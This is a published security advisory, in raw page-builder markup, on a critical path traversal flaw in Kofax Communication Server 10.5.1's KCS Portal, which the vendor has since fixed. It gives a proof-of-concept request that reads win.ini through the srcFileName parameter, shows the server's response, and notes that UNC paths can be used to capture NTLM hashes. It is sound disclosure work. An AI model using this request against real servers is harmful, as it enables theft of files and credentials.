{"id":24951,"date":"2026-03-06T15:14:33","date_gmt":"2026-03-06T14:14:33","guid":{"rendered":"https:\/\/herolab.usd.de\/security-advisories\/usd-2025-0066\/"},"modified":"2026-03-10T10:03:40","modified_gmt":"2026-03-10T09:03:40","slug":"usd-2025-0066","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0066\/","title":{"rendered":"usd-2025-0066"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.27.5\" _module_preset=\"default\" custom_padding=\"||13px|||\" global_colors_info=\"{}\"]<\/p>\n

usd-2025-66 | Kofax Communication Server 10.5.1 - Path Traversal<\/h1>\n

<\/h1>\n

Product<\/strong>: Kofax Communication Server
Affected Version<\/strong>: 10.5.1
Vulnerability Type<\/strong>: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Security Risk<\/strong>: Critical
Vendor<\/strong>: Tungsten Automation
Vendor URL<\/strong>: https:\/\/www.tungstenautomation.de\/<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: Requested
CVE Link<\/strong>: Not requested yet
Advisory ID<\/strong>: usd-2025-66<\/p>\n

Description<\/h3>\n

Kofax Communication Server (KCS)<\/em>, formerly known as TOPCALL<\/em> is used as a message broker, mainly for TELEX messages (aerospace-specific messages that, for example, inform about airplane movements). Other message types, such as AFTN, ASCARS, SMS and FAX are supported, too.<\/p>\n

The web application KCS Portal<\/em> allows configuration of allowed recipients and senders, viewing transmitted messages, monitoring functionality, user management, and composing messages.<\/p>\n

The web application is vulnerable to path traversal attacks.<\/p>\n

When downloading attachments from messages, the source file name as stored on the backends disk is passed as a parameter in the URL.
The srcFileName<\/strong> parameter is not validated and therefore allows attackers to specify arbitrary files including directory traversals (..\/<\/strong>) and absolute Paths (*C:*<\/em>) outside the download directory.<\/p>\n

This vulnerability allows an attacker to read from the application's underlying file system.
By this, it is possible to retrieve configuration files, password or login information or any other files containing sensitive data.<\/p>\n

Proof of Concept<\/h3>\n

The following request allows to download the file C:\\Windows\\win.ini<\/strong> from the application server:<\/p>\n

GET \/kcsportal\/api\/v1\/download\/[redacted]?Kcs-ConnectionHandle=[...]&srcFileName=.\/..\/..\/..\/..\/..\/..\/Windows\/win.ini&destFileName=test.html HTTP\/1.1
Host: [redacted]
Cookie: [redacted]<\/pre>\n
The server responds with the content of the requested file:<\/p>\n
HTTP\/1.1 200 OK
Content-Type: application\/octet-stream
Content-Disposition: attachment; 
filename=test.html
[...]
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1<\/pre>\n
Furthermore, it is possible to specify UNC paths as source file name. If an attacker is able to run an SMB server in the adjacent network, it is possible to capture the NTLM hash of the user running the server application.<\/p>\n
Fix<\/h3>\n
It is recommended to filter all input that is used in the context of file operations for path specifications.
Ideally, the file system of the application should be isolated, e.g., using sandboxing<\/em>.<\/p>\n
References<\/h3>\n